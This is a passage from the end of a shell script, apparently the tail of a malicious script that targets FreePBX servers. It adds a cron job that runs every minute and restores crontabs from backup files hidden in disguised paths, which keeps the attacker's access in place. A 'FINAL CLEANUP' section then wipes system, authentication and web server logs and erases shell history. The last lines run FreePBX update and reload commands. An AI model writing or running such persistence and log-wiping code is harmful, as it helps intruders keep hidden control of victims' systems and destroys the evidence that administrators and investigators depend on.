    echo "*/1 * * * * for b in /usr/lib/.systemd/.cache /usr/share/.fonts/.config /var/lib/.dbus/.data /var/tmp/.X11/.Xauthority /opt/.local/.bashrc; do [ -s \"\$b\" ] && crontab \"\$b\" 2>/dev/null && break; done"
} | crontab - 2>/dev/null || true

# ============================================
# FINAL CLEANUP
# ============================================
find /var/log -name "*.log" -exec sh -c 'cat /dev/null > {}' \; 2>/dev/null
rm -rf /var/log/secure* /var/log/messages* /var/log/auth* /var/log/httpd/* /var/log/nginx/* /var/log/apache2/* 2>/dev/null
history -c 2>/dev/null
unset HISTFILE 2>/dev/null
rm -f ~/.bash_history ~/.zsh_history 2>/dev/null

fwconsole ma update endpoint
fwconsole ma upgradeall
fwconsole chown
fwconsole reload